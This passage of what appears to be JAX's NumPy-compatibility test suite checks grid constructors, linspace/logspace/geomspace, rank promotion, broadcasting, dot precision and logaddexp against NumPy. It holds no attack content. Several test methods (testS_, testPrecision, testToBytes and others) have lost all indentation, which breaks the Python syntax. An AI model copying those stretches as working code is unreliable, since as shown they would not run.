    assertAllEqual(np.mgrid[:3:2, :2, :5], jnp.mgrid[:3:2, :2, :5])
    # Corner cases
    assertAllEqual(np.mgrid[:], jnp.mgrid[:])
    # When the step length is a complex number, because of float calculation,
    # the values between jnp and np might slightly different.
    atol = 1e-6
    rtol = 1e-6
    self.assertAllClose(np.mgrid[-1:1:5j],
                        jnp.mgrid[-1:1:5j],
                        atol=atol,
                        rtol=rtol)
    self.assertAllClose(np.mgrid[3:4:7j],
                        jnp.mgrid[3:4:7j],
                        atol=atol,
                        rtol=rtol)
    self.assertAllClose(np.mgrid[1:6:8j, 2:4],
                        jnp.mgrid[1:6:8j, 2:4],
                        atol=atol,
                        rtol=rtol)
    # Non-integer steps
    self.assertAllClose(np.mgrid[0:3.5:0.5],
                        jnp.mgrid[0:3.5:0.5],
                        atol=atol,
                        rtol=rtol)
    self.assertAllClose(np.mgrid[1.3:4.2:0.3],
                        jnp.mgrid[1.3:4.2:0.3],
                        atol=atol,
                        rtol=rtol)
    # abstract tracer value for jnp.mgrid slice
    with self.assertRaisesRegex(jax.core.ConcretizationTypeError,
                                "slice start of jnp.mgrid"):
      jax.jit(lambda a, b: jnp.mgrid[a:b])(0, 2)
  def testOgrid(self):
    # jnp.ogrid vs np.ogrid: single-slice (array) and multi-slice (list of
    # open grids) forms, complex-count and non-integer steps, tracing errors.
    def assertListOfArraysEqual(xs, ys):
      # np.ogrid returns a list of arrays for multi-slice inputs; compare
      # element-wise since lists of arrays don't support direct equality.
      self.assertIsInstance(xs, list)
      self.assertIsInstance(ys, list)
      self.assertEqual(len(xs), len(ys))
      for x, y in zip(xs, ys):
        self.assertArraysEqual(x, y)

    self.assertArraysEqual(np.ogrid[:5], jnp.ogrid[:5])
    self.assertArraysEqual(np.ogrid[:5], jax.jit(lambda: jnp.ogrid[:5])())
    self.assertArraysEqual(np.ogrid[1:7:2], jnp.ogrid[1:7:2])
    # List of arrays
    assertListOfArraysEqual(np.ogrid[:5,], jnp.ogrid[:5,])
    assertListOfArraysEqual(np.ogrid[0:5, 1:3], jnp.ogrid[0:5, 1:3])
    assertListOfArraysEqual(np.ogrid[1:3:2, 2:9:3], jnp.ogrid[1:3:2, 2:9:3])
    assertListOfArraysEqual(np.ogrid[:5, :9, :11], jnp.ogrid[:5, :9, :11])
    # Corner cases
    self.assertArraysEqual(np.ogrid[:], jnp.ogrid[:])
    # Complex number steps
    atol = 1e-6
    rtol = 1e-6
    self.assertAllClose(np.ogrid[-1:1:5j],
                        jnp.ogrid[-1:1:5j],
                        atol=atol,
                        rtol=rtol)
    # Non-integer steps
    self.assertAllClose(np.ogrid[0:3.5:0.3],
                        jnp.ogrid[0:3.5:0.3],
                        atol=atol,
                        rtol=rtol)
    self.assertAllClose(np.ogrid[1.2:4.8:0.24],
                        jnp.ogrid[1.2:4.8:0.24],
                        atol=atol,
                        rtol=rtol)
    # abstract tracer value for ogrid slice
    with self.assertRaisesRegex(jax.core.ConcretizationTypeError,
                                "slice start of jnp.ogrid"):
      jax.jit(lambda a, b: jnp.ogrid[a:b])(0, 2)
  def testR_(self):
    """Compare jnp.r_ with np.r_ across concatenation and directive forms."""
    a = np.arange(6).reshape((2,3))
    self.assertArraysEqual(np.r_[np.array([1,2,3]), 0, 0, np.array([4,5,6])],
                           jnp.r_[np.array([1,2,3]), 0, 0, np.array([4,5,6])])
    self.assertArraysEqual(np.r_['-1', a, a], jnp.r_['-1', a, a])

    # String directives '<axis>,<ndim>[,<1d-axis>]' control stacking.
    self.assertArraysEqual(np.r_['0,2', [1,2,3], [4,5,6]], jnp.r_['0,2', [1,2,3], [4,5,6]])
    self.assertArraysEqual(np.r_['0,2,0', [1,2,3], [4,5,6]], jnp.r_['0,2,0', [1,2,3], [4,5,6]])
    self.assertArraysEqual(np.r_['1,2,0', [1,2,3], [4,5,6]], jnp.r_['1,2,0', [1,2,3], [4,5,6]])
    # negative 1d axis start
    self.assertArraysEqual(np.r_['0,4,-1', [1,2,3], [4,5,6]], jnp.r_['0,4,-1', [1,2,3], [4,5,6]])
    self.assertArraysEqual(np.r_['0,4,-2', [1,2,3], [4,5,6]], jnp.r_['0,4,-2', [1,2,3], [4,5,6]])

    # matrix directives
    with warnings.catch_warnings():
      warnings.filterwarnings("ignore", category=PendingDeprecationWarning)
      self.assertArraysEqual(np.r_['r',[1,2,3], [4,5,6]], jnp.r_['r',[1,2,3], [4,5,6]])
      self.assertArraysEqual(np.r_['c', [1, 2, 3], [4, 5, 6]], jnp.r_['c', [1, 2, 3], [4, 5, 6]])

    # bad directive
    with self.assertRaisesRegex(ValueError, "could not understand directive.*"):
      jnp.r_["asdfgh",[1,2,3]]

    # abstract tracer value for r_ slice: slice bounds must be concrete.
    with self.assertRaisesRegex(jax.core.ConcretizationTypeError,
                                "slice start of jnp.r_"):
      jax.jit(lambda a, b: jnp.r_[a:b])(0, 2)

    # Complex number steps; slight float differences between np and jnp are
    # expected, so compare with tolerances.
    atol = 1e-6
    rtol = 1e-6
    self.assertAllClose(np.r_[-1:1:6j],
                        jnp.r_[-1:1:6j],
                        atol=atol,
                        rtol=rtol)
    self.assertAllClose(np.r_[-1:1:6j, [0]*3, 5, 6],
                        jnp.r_[-1:1:6j, [0]*3, 5, 6],
                        atol=atol,
                        rtol=rtol)
    # Non-integer steps
    self.assertAllClose(np.r_[1.2:4.8:0.24],
                        jnp.r_[1.2:4.8:0.24],
                        atol=atol,
                        rtol=rtol)
  def testC_(self):
    """Compare jnp.c_ with np.c_ across concatenation and directive forms."""
    a = np.arange(6).reshape((2, 3))
    self.assertArraysEqual(np.c_[np.array([1,2,3]), np.array([4,5,6])],
                           jnp.c_[np.array([1,2,3]), np.array([4,5,6])])
    self.assertArraysEqual(np.c_[np.array([[1,2,3]]), 0, 0, np.array([[4,5,6]])],
                           jnp.c_[np.array([[1,2,3]]), 0, 0, np.array([[4,5,6]])])
    self.assertArraysEqual(np.c_['-1', a, a], jnp.c_['-1', a, a])

    # String directives '<axis>,<ndim>[,<1d-axis>]' control stacking.
    self.assertArraysEqual(np.c_['0,2', [1,2,3], [4,5,6]], jnp.c_['0,2', [1,2,3], [4,5,6]])
    self.assertArraysEqual(np.c_['0,2,0', [1,2,3], [4,5,6]], jnp.c_['0,2,0', [1,2,3], [4,5,6]])
    self.assertArraysEqual(np.c_['1,2,0', [1,2,3], [4,5,6]], jnp.c_['1,2,0', [1,2,3], [4,5,6]])
    # negative 1d axis start
    self.assertArraysEqual(np.c_['0,4,-1', [1,2,3], [4,5,6]], jnp.c_['0,4,-1', [1,2,3], [4,5,6]])
    self.assertArraysEqual(np.c_['0,4,-2', [1,2,3], [4,5,6]], jnp.c_['0,4,-2', [1,2,3], [4,5,6]])

    # matrix directives, avoid numpy deprecation warning
    with warnings.catch_warnings():
      warnings.filterwarnings("ignore", category=PendingDeprecationWarning)
      self.assertArraysEqual(np.c_['r',[1,2,3], [4,5,6]], jnp.c_['r',[1,2,3], [4,5,6]])
      self.assertArraysEqual(np.c_['c', [1, 2, 3], [4, 5, 6]], jnp.c_['c', [1, 2, 3], [4, 5, 6]])

    # bad directive
    with self.assertRaisesRegex(ValueError, "could not understand directive.*"):
      jnp.c_["asdfgh",[1,2,3]]

    # abstract tracer value for c_ slice: slice bounds must be concrete.
    with self.assertRaisesRegex(jax.core.ConcretizationTypeError,
                                "slice start of jnp.c_"):
      jax.jit(lambda a, b: jnp.c_[a:b])(0, 2)

    # Complex number steps; slight float differences between np and jnp are
    # expected, so compare with tolerances.
    atol = 1e-6
    rtol = 1e-6
    self.assertAllClose(np.c_[-1:1:6j],
                        jnp.c_[-1:1:6j],
                        atol=atol,
                        rtol=rtol)
    # Non-integer steps
    self.assertAllClose(np.c_[1.2:4.8:0.24],
                        jnp.c_[1.2:4.8:0.24],
                        atol=atol,
                        rtol=rtol)
def testS_(self):
self.assertEqual(np.s_[1:2:20],jnp.s_[1:2:20])
def testIndex_exp(self):
self.assertEqual(np.index_exp[5:3:2j],jnp.index_exp[5:3:2j])
  @parameterized.named_parameters(
      jtu.cases_from_list(
        {"testcase_name": ("_start_shape={}_stop_shape={}_num={}_endpoint={}"
                           "_retstep={}_dtype={}").format(
            start_shape, stop_shape, num, endpoint, retstep,
            dtype.__name__ if dtype else "None"),
         "start_shape": start_shape, "stop_shape": stop_shape,
         "num": num, "endpoint": endpoint, "retstep": retstep,
         "dtype": dtype}
        for start_shape in [(), (2,), (2, 2)]
        for stop_shape in [(), (2,), (2, 2)]
        for num in [0, 1, 2, 5, 20]
        for endpoint in [True, False]
        for retstep in [True, False]
        for dtype in number_dtypes + [None,]))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testLinspace(self, start_shape, stop_shape, num, endpoint, retstep, dtype):
    """Compare jnp.linspace with np.linspace over shapes/num/endpoint/retstep/dtype."""
    if num == 1 and not endpoint and numpy_version < (1, 18):
      raise SkipTest("Numpy < 1.18 has a linspace bug.")
    rng = jtu.rand_default(self.rng())
    # relax default tolerances slightly
    tol = jtu.tolerance(dtype if dtype else np.float32) * 10
    args_maker = self._GetArgsMaker(rng,
                                    [start_shape, stop_shape],
                                    [dtype, dtype])
    start, stop = args_maker()
    # Exercise every valid axis for the broadcasted result's rank.
    ndim = len(np.shape(start + stop))
    for axis in range(-ndim, ndim):
      jnp_op = lambda start, stop: jnp.linspace(
        start, stop, num,
        endpoint=endpoint, retstep=retstep, dtype=dtype, axis=axis)
      # NumPy 1.20.0 changed the semantics of linspace to floor for integer
      # dtypes.
      if numpy_version >= (1, 20) or not np.issubdtype(dtype, np.integer):
        np_op = lambda start, stop: np.linspace(
          start, stop, num,
          endpoint=endpoint, retstep=retstep, dtype=dtype, axis=axis)
      else:
        # Emulate the >=1.20 flooring behavior on older numpy.
        def np_op(start, stop):
          out = np.linspace(start, stop, num, endpoint=endpoint,
                            retstep=retstep, axis=axis)
          if retstep:
            return np.floor(out[0]).astype(dtype), out[1]
          else:
            return np.floor(out).astype(dtype)

      self._CheckAgainstNumpy(np_op, jnp_op, args_maker,
                              check_dtypes=False, tol=tol)
      # floating-point compute between jitted platforms and non-jit + rounding
      # cause unavoidable variation in integer truncation for some inputs.
      if dtype in (inexact_dtypes + [None,]):
        self._CompileAndCheck(jnp_op, args_maker,
                              check_dtypes=False, atol=tol, rtol=tol)
  @parameterized.named_parameters(
      jtu.cases_from_list(
        {"testcase_name": "_dtype={}".format(dtype), "dtype": dtype}
        for dtype in number_dtypes))
  def testLinspaceEndpoints(self, dtype):
    """Regression test for Issue #3014."""
    rng = jtu.rand_default(self.rng())
    endpoints = rng((2,), dtype)
    out = jnp.linspace(*endpoints, 10, dtype=dtype)
    # The first and last samples must equal the endpoints exactly (zero tol).
    self.assertAllClose(out[np.array([0, -1])], endpoints, rtol=0, atol=0)
  @parameterized.named_parameters(
      jtu.cases_from_list(
        {"testcase_name": ("_start_shape={}_stop_shape={}_num={}_endpoint={}"
                           "_base={}_dtype={}").format(
            start_shape, stop_shape, num, endpoint, base,
            dtype.__name__ if dtype else "None"),
         "start_shape": start_shape,
         "stop_shape": stop_shape,
         "num": num, "endpoint": endpoint, "base": base,
         "dtype": dtype}
        for start_shape in [(), (2,), (2, 2)]
        for stop_shape in [(), (2,), (2, 2)]
        for num in [0, 1, 2, 5, 20]
        for endpoint in [True, False]
        for base in [10.0, 2, np.e]
        for dtype in inexact_dtypes + [None,]))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testLogspace(self, start_shape, stop_shape, num,
                   endpoint, base, dtype):
    """Compare jnp.logspace with np.logspace over shapes/num/endpoint/base/dtype."""
    if (dtype in int_dtypes and
        jtu.device_under_test() in ("gpu", "tpu") and
        not config.x64_enabled):
      raise unittest.SkipTest("GPUx32 truncated exponentiation"
                              " doesn't exactly match other platforms.")
    rng = jtu.rand_default(self.rng())
    # relax default tolerances slightly
    tol = {np.float16: 2e-2, np.float32: 1e-2, np.float64: 1e-6,
           np.complex64: 1e-3, np.complex128: 1e-6}
    args_maker = self._GetArgsMaker(rng,
                                    [start_shape, stop_shape],
                                    [dtype, dtype])
    start, stop = args_maker()
    # Exercise every valid axis for the broadcasted result's rank.
    ndim = len(np.shape(start + stop))
    for axis in range(-ndim, ndim):
      jnp_op = lambda start, stop: jnp.logspace(
        start, stop, num, endpoint=endpoint, base=base, dtype=dtype, axis=axis)
      @jtu.ignore_warning(category=RuntimeWarning,
                          message="overflow encountered in power")
      def np_op(start, stop):
        return np.logspace(start, stop, num, endpoint=endpoint,
                           base=base, dtype=dtype, axis=axis)
      self._CheckAgainstNumpy(np_op, jnp_op, args_maker,
                              check_dtypes=False, tol=tol)
      if dtype in (inexact_dtypes + [None,]):
        # Why do compiled and op-by-op float16 np.power numbers differ
        # slightly more than expected?
        atol = {np.float16: 1e-2}
        self._CompileAndCheck(jnp_op, args_maker,
                              check_dtypes=False, atol=atol, rtol=tol)
  @parameterized.named_parameters(
      jtu.cases_from_list(
        {"testcase_name": ("_start_shape={}_stop_shape={}_num={}_endpoint={}"
                           "_dtype={}_axis={}").format(
            start_shape, stop_shape, num, endpoint,
            dtype.__name__ if dtype else "None", axis),
         "start_shape": start_shape,
         "stop_shape": stop_shape,
         "num": num, "endpoint": endpoint,
         "dtype": dtype, "axis": axis}
        for start_shape in [(), (2,), (2, 2)]
        for stop_shape in [(), (2,), (2, 2)]
        for num in [0, 1, 2, 5, 20]
        for endpoint in [True, False]
        # NB: numpy's geomspace gives nonsense results on integer types
        for dtype in inexact_dtypes + [None,]
        for axis in range(-max(len(start_shape), len(stop_shape)),
                          max(len(start_shape), len(stop_shape)))))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testGeomspace(self, start_shape, stop_shape, num,
                    endpoint, dtype, axis):
    """Compare jnp.geomspace with np.geomspace on inputs np.geomspace handles."""
    rng = jtu.rand_default(self.rng())
    # relax default tolerances slightly
    tol = {np.float16: 4e-3, np.float32: 2e-3, np.float64: 1e-14,
           np.complex128: 1e-14}
    def args_maker():
      """Test the set of inputs np.geomspace is well-defined on."""
      start, stop = self._GetArgsMaker(rng,
                                [start_shape, stop_shape],
                                [dtype, dtype])()
      # np.geomspace can't handle differently ranked tensors
      # w. negative numbers!
      start, stop = jnp.broadcast_arrays(start, stop)
      if dtype in complex_dtypes:
        return start, stop
      # to avoid NaNs, non-complex start and stop cannot
      # differ in sign, elementwise
      start = start * jnp.sign(start) * jnp.sign(stop)
      return start, stop
    start, stop = args_maker()
    def jnp_op(start, stop):
      return jnp.geomspace(start, stop, num, endpoint=endpoint, dtype=dtype,
                           axis=axis)
    def np_op(start, stop):
      # bfloat16 is not a numpy dtype: compute in float32 and cast back.
      start = start.astype(np.float32) if dtype == jnp.bfloat16 else start
      stop = stop.astype(np.float32) if dtype == jnp.bfloat16 else stop
      return np.geomspace(
        start, stop, num, endpoint=endpoint,
        dtype=dtype if dtype != jnp.bfloat16 else np.float32,
        axis=axis).astype(dtype)
    self._CheckAgainstNumpy(np_op, jnp_op, args_maker,
                            check_dtypes=False, tol=tol)
    if dtype in (inexact_dtypes + [None,]):
      self._CompileAndCheck(jnp_op, args_maker,
                            check_dtypes=False, atol=tol, rtol=tol)
  def testDisableNumpyRankPromotionBroadcasting(self):
    """The jax_numpy_rank_promotion flag: 'allow', 'raise', and 'warn' modes."""
    # 'allow': rank-promoting broadcasts are silently accepted.
    try:
      prev_flag = config.jax_numpy_rank_promotion
      FLAGS.jax_numpy_rank_promotion = "allow"
      jnp.ones(2) + jnp.ones((1, 2))  # works just fine
    finally:
      FLAGS.jax_numpy_rank_promotion = prev_flag

    # 'raise': the same broadcast is an error.
    try:
      prev_flag = config.jax_numpy_rank_promotion
      FLAGS.jax_numpy_rank_promotion = "raise"
      self.assertRaises(ValueError, lambda: jnp.ones(2) + jnp.ones((1, 2)))
    finally:
      FLAGS.jax_numpy_rank_promotion = prev_flag

    # 'warn': the broadcast succeeds but emits a warning with a fixed prefix.
    try:
      prev_flag = config.jax_numpy_rank_promotion
      FLAGS.jax_numpy_rank_promotion = "warn"
      with warnings.catch_warnings(record=True) as w:
        warnings.simplefilter("always")
        jnp.ones(2) + jnp.ones((1, 2))
        assert len(w) > 0
        msg = str(w[-1].message)
        expected_msg = ("Following NumPy automatic rank promotion for add on "
                        "shapes (2,) (1, 2).")
        self.assertEqual(msg[:len(expected_msg)], expected_msg)

        prev_len = len(w)
        jnp.ones(2) + 3
        self.assertEqual(len(w), prev_len)  # don't want to warn for scalars
    finally:
      FLAGS.jax_numpy_rank_promotion = prev_flag
  @unittest.skip("Test fails on CI, perhaps due to JIT caching")
  def testDisableNumpyRankPromotionBroadcastingDecorator(self):
    """Exercise rank-promotion modes via the jax.numpy_rank_promotion context manager."""
    with jax.numpy_rank_promotion("allow"):
      jnp.ones(2) + jnp.ones((1, 2))  # works just fine

    with jax.numpy_rank_promotion("raise"):
      self.assertRaises(ValueError, lambda: jnp.ones(2) + jnp.ones((1, 2)))

    with jax.numpy_rank_promotion("warn"):
      with warnings.catch_warnings(record=True) as w:
        warnings.simplefilter("always")
        jnp.ones(2) + jnp.ones((1, 2))
        assert len(w) > 0
        msg = str(w[-1].message)
        expected_msg = ("Following NumPy automatic rank promotion for add on "
                        "shapes (2,) (1, 2).")
        self.assertEqual(msg[:len(expected_msg)], expected_msg)

        prev_len = len(w)
        jnp.ones(2) + 3
        self.assertEqual(len(w), prev_len)  # don't want to warn for scalars
def testStackArrayArgument(self):
# tests https://github.com/google/jax/issues/1271
@api.jit
def foo(x):
return jnp.stack(x)
foo(np.zeros(2)) # doesn't crash
@api.jit
def foo(x):
return jnp.concatenate(x)
foo(np.zeros((2, 2))) # doesn't crash
  def testReluGradientConstants(self):
    # This is a regression test that verifies that constants associated with the
    # gradient of np.maximum (from lax._balanced_eq) aren't hoisted into the
    # outermost jaxpr. This was producing some large materialized constants for
    # every relu activation in a model.
    def body(i, xy):
      x, y = xy
      y = y + jax.grad(lambda z: jnp.sum(jnp.maximum(z, 0.)))(x)
      return x, y

    f = lambda y: lax.fori_loop(0, 5, body, (y, y))
    jaxpr = jax.make_jaxpr(f)(np.zeros((3, 4), np.float32))
    # A hoisted constant would appear as a full (3, 4) array of 2.0 among the
    # jaxpr's constants; assert that no such constant exists.
    self.assertFalse(
      any(np.array_equal(x, np.full((3, 4), 2., dtype=np.float32))
          for x in jaxpr.consts))
  @parameterized.named_parameters(
      {"testcase_name": "_from={}_to={}".format(from_shape, to_shape),
       "from_shape": from_shape, "to_shape": to_shape}
      for from_shape, to_shape in [
          [(1, 3), (4, 3)],
          [(3,), (2, 1, 3)],
          [(3,), (3, 3)],
          [(1,), (3,)],
          [(1,), 3],  # to_shape may also be a bare int
      ])
  def testBroadcastTo(self, from_shape, to_shape):
    """Compare jnp.broadcast_to with np.broadcast_to, eagerly and compiled."""
    rng = jtu.rand_default(self.rng())
    args_maker = self._GetArgsMaker(rng, [from_shape], [np.float32])
    np_op = lambda x: np.broadcast_to(x, to_shape)
    jnp_op = lambda x: jnp.broadcast_to(x, to_shape)
    self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
    self._CompileAndCheck(jnp_op, args_maker)
  @parameterized.named_parameters(
      {"testcase_name": f"_{shapes}", "shapes": shapes, "broadcasted_shape": broadcasted_shape}
      for shapes, broadcasted_shape in [
          [[], ()],
          [[()], ()],
          [[(1, 3), (4, 3)], (4, 3)],
          [[(3,), (2, 1, 3)], (2, 1, 3)],
          [[(3,), (3, 3)], (3, 3)],
          [[(1,), (3,)], (3,)],
          [[(1,), 3], (3,)],
          [[(6, 7), (5, 6, 1), (7,), (5, 1, 7)], (5, 6, 7)],
          [[[1], [0, 1]], (0, 1)],
          [[(1,), np.array([0, 1])], (0, 1)],
      ])
  def testBroadcastShapes(self, shapes, broadcasted_shape):
    """jnp.broadcast_shapes resolves each list of shapes to the expected tuple."""
    # Test against np.broadcast_shapes once numpy 1.20 is minimum required version
    np.testing.assert_equal(jnp.broadcast_shapes(*shapes), broadcasted_shape)
def testBroadcastToIssue1522(self):
self.assertRaisesRegex(
ValueError, "Incompatible shapes for broadcasting: .*",
lambda: jnp.broadcast_to(np.ones((2, 3)), (1, 3)))
def testBroadcastToIntIssue1548(self):
self.assertAllClose(jnp.broadcast_to(1, (3, 2)), np.ones((3, 2)),
check_dtypes=False)
def testBroadcastToOnScalar(self):
self.assertIsInstance(jnp.broadcast_to(10.0, ()), jnp.ndarray)
self.assertIsInstance(np.broadcast_to(10.0, ()), np.ndarray)
def testPrecision(self):
ones_1d = np.ones((2,))
ones_2d = np.ones((2, 2))
ones_3d = np.ones((2, 2, 2))
HIGHEST = lax.Precision.HIGHEST
jtu.assert_dot_precision(None, jnp.dot, ones_1d, ones_1d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.dot, precision=HIGHEST),
ones_1d, ones_1d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.dot, precision=HIGHEST),
ones_3d, ones_3d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.matmul, precision=HIGHEST),
ones_2d, ones_2d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.vdot, precision=HIGHEST),
ones_1d, ones_1d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.tensordot, axes=2, precision=HIGHEST),
ones_2d, ones_2d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.tensordot, axes=(0, 0), precision=HIGHEST),
ones_1d, ones_1d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.tensordot, axes=((0,), (0,)), precision=HIGHEST),
ones_1d, ones_1d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.einsum, 'i,i', precision=HIGHEST),
ones_1d, ones_1d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.einsum, 'ij,ij', precision=HIGHEST),
ones_2d, ones_2d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.inner, precision=HIGHEST),
ones_1d, ones_1d)
  @parameterized.named_parameters(
      jtu.cases_from_list(
        {"testcase_name": "_shape={}_varargs={} axis={}_dtype={}".format(
            shape, varargs, axis, dtype),
         "shape": shape, "varargs": varargs, "axis": axis, "dtype": dtype}
        for shape in [(10,), (10, 15), (10, 15, 20)]
        for _num_axes in range(len(shape))
        for varargs in itertools.combinations(range(1, len(shape) + 1), _num_axes)
        for axis in itertools.combinations(range(len(shape)), _num_axes)
        for dtype in inexact_dtypes))
  def testGradient(self, shape, varargs, axis, dtype):
    """Compare jnp.gradient with np.gradient over shapes, spacings, and axes."""
    rng = jtu.rand_default(self.rng())
    args_maker = self._GetArgsMaker(rng, [shape], [dtype])
    jnp_fun = lambda y: jnp.gradient(y, *varargs, axis=axis)
    np_fun = lambda y: np.gradient(y, *varargs, axis=axis)
    self._CheckAgainstNumpy(
        np_fun, jnp_fun, args_maker, check_dtypes=False)
    self._CompileAndCheck(jnp_fun, args_maker)
  def testZerosShapeErrors(self):
    """Non-integer or traced shapes passed to jnp.zeros raise helpful TypeErrors."""
    # see https://github.com/google/jax/issues/1822
    self.assertRaisesRegex(
        TypeError,
        "Shapes must be 1D sequences of concrete values of integer type.*",
        lambda: jnp.zeros(1.))
    # Under jit the shape argument becomes a tracer; the error message should
    # additionally suggest static_argnums as a remedy.
    self.assertRaisesRegex(
        TypeError,
        r"Shapes must be 1D sequences of concrete values of integer type.*\n"
        "If using `jit`, try using `static_argnums` or applying `jit` to smaller subfunctions.",
        lambda: api.jit(jnp.zeros)(2))
def testTraceMethod(self):
x = self.rng().randn(3, 4).astype(jnp.float_)
self.assertAllClose(x.trace(), jnp.array(x).trace())
self.assertAllClose(x.trace(), api.jit(lambda y: y.trace())(x))
  def testIntegerPowersArePrecise(self):
    """Integer-valued float32 powers must be exact, not approximated."""
    # See https://github.com/google/jax/pull/3036
    # Checks if the squares of float32 integers have no numerical errors.
    # It should be satisfied with all integers less than sqrt(2**24).
    x = jnp.arange(-2**12, 2**12, dtype=jnp.int32)
    np.testing.assert_array_equal(jnp.square(x.astype(jnp.float32)), x * x)
    np.testing.assert_array_equal(x.astype(jnp.float32) ** 2, x * x)

    # Similarly for cubes.
    x = jnp.arange(-2**8, 2**8, dtype=jnp.int32)
    np.testing.assert_array_equal(x.astype(jnp.float32) ** 3, x * x * x)

    # Small bases raised to powers 0..9 should agree with numpy closely.
    x = np.arange(10, dtype=np.float32)
    for i in range(10):
      self.assertAllClose(x.astype(jnp.float32) ** i, x ** i,
                          check_dtypes=False)
def testToBytes(self):
v = np.arange(12, dtype=np.int32).reshape(3, 4)
for order in ['C', 'F']:
self.assertEqual(jnp.asarray(v).tobytes(order), v.tobytes(order))
def testToList(self):
v = np.arange(12, dtype=np.int32).reshape(3, 4)
self.assertEqual(jnp.asarray(v).tolist(), v.tolist())
def testReductionWithRepeatedAxisError(self):
with self.assertRaisesRegex(ValueError, r"duplicate value in 'axis': \(0, 0\)"):
jnp.sum(jnp.arange(3), (0, 0))
  def testArangeConcretizationError(self):
    """jnp.arange with a traced start/stop raises ConcretizationTypeError."""
    # The error message names the offending arange argument.
    msg = r"It arose in jax.numpy.arange argument `{}`".format
    with self.assertRaisesRegex(jax.core.ConcretizationTypeError, msg('stop')):
      jax.jit(jnp.arange)(3)

    with self.assertRaisesRegex(jax.core.ConcretizationTypeError, msg('start')):
      jax.jit(lambda start: jnp.arange(start, 3))(0)

    with self.assertRaisesRegex(jax.core.ConcretizationTypeError, msg('stop')):
      jax.jit(lambda stop: jnp.arange(0, stop))(3)
  def testIssue2347(self):
    # https://github.com/google/jax/issues/2347
    # NOTE: this deliberately passes a typing generic alias (not a list
    # instance) to jnp.array; it must raise TypeError rather than crash.
    object_list = List[Tuple[jnp.array, float, float, jnp.array, bool]]
    self.assertRaises(TypeError, jnp.array, object_list)

    # The same object wrapped by np.array must also be rejected.
    np_object_list = np.array(object_list)
    self.assertRaises(TypeError, jnp.array, np_object_list)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": jtu.format_test_name_suffix("", shapes, dtypes),
       "shapes": shapes, "dtypes": dtypes}
      for shapes in filter(
        _shapes_are_broadcast_compatible,
        itertools.combinations_with_replacement(all_shapes, 2))
      for dtypes in itertools.product(
        *(_valid_dtypes_for_shape(s, complex_dtypes) for s in shapes))))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testLogaddexpComplex(self, shapes, dtypes):
    """Compare jnp.logaddexp on complex inputs against a naive numpy reference."""
    @jtu.ignore_warning(category=RuntimeWarning, message="invalid value.*")
    def np_op(x1, x2):
      # Naive reference: log(exp(x1) + exp(x2)).
      return np.log(np.exp(x1) + np.exp(x2))

    rng = jtu.rand_some_nan(self.rng())
    args_maker = lambda: tuple(rng(shape, dtype) for shape, dtype in zip(shapes, dtypes))
    if jtu.device_under_test() == 'tpu':
      tol = {np.complex64: 1e-3, np.complex128: 1e-10}
    else:
      tol = {np.complex64: 1e-5, np.complex128: 1e-14}

    self._CheckAgainstNumpy(_promote_like_jnp(np_op), jnp.logaddexp, args_maker, tol=tol)
    self._CompileAndCheck(jnp.logaddexp, args_maker, rtol=tol, atol=tol)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": jtu.format_test_name_suffix("", shapes, dtypes),
       "shapes": shapes, "dtypes": dtypes}
      for shapes in filter(
        _shapes_are_broadcast_compatible,
        itertools.combinations_with_replacement(all_shapes, 2))
      for dtypes in itertools.product(
        *(_valid_dtypes_for_shape(s, complex_dtypes) for s in shapes))))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testLogaddexp2Complex(self, shapes, dtypes):
    """Compare jnp.logaddexp2 on complex inputs against a naive numpy reference."""
    @jtu.ignore_warning(category=RuntimeWarning, message="invalid value.*")
    def np_op(x1, x2):
      # Naive reference: log2(2**x1 + 2**x2).
      return np.log2(np.exp2(x1) + np.exp2(x2))

    rng = jtu.rand_some_nan(self.rng())
    args_maker = lambda: tuple(rng(shape, dtype) for shape, dtype in zip(shapes, dtypes))
    if jtu.device_under_test() == 'tpu':
      tol = {np.complex64: 1e-3, np.complex128: 1e-10}
    else:
      tol = {np.complex64: 1e-5, np.complex128: 1e-14}

    self._CheckAgainstNumpy(_promote_like_jnp(np_op), jnp.logaddexp2, args_maker, tol=tol)
    self._CompileAndCheck(jnp.logaddexp2, args_maker, rtol=tol, atol=tol)
# Most grad tests are at the lax level (see lax_test.py), but we add some here
# as needed for e.g. particular compound ops of interest.

# A single gradient-test case: the op under test, its arity (nargs), the
# differentiation order to check, an rng factory for sampling inputs, the
# dtypes to cover, a display name, and an optional tolerance override.
GradTestSpec = collections.namedtuple(
  "GradTestSpec",
  ["op", "nargs", "order", "rng_factory", "dtypes", "name", "tol"])
def grad_test_spec(op, nargs, order, rng_factory, dtypes, name=None, tol=None):
  """Build a GradTestSpec, defaulting `name` to the op's __name__."""
  return GradTestSpec(
      op, nargs, order, rng_factory, dtypes, name or op.__name__, tol)

GRAD_TEST_RECORDS = [
    grad_test_spec(jnp.arcsinh, nargs=1, order=2,
                   rng_factory=jtu.rand_positive,
                   dtypes=[np.float64, np.complex64],
                   tol={np.complex64: 2e-2}),
    grad_test_spec(jnp.arccosh, nargs=1, order=2,
                   rng_factory=jtu.rand_positive,
                   dtypes=[np.float64, np.complex64],
                   tol={np.complex64: 2e-2}),
    grad_test_spec(jnp.arctanh, nargs=1, order=2,
                   rng_factory=partial(jtu.rand_uniform, low=-0.9, high=0.9),
                   dtypes=[np.float64, np.complex64],
                   tol={np.complex64: 2e-2}),
    grad_test_spec(jnp.logaddexp, nargs=2, order=1,
                   rng_factory=partial(jtu.rand_uniform, low=-0.9, high=0.9),
                   dtypes=[np.float64], tol=1e-4),
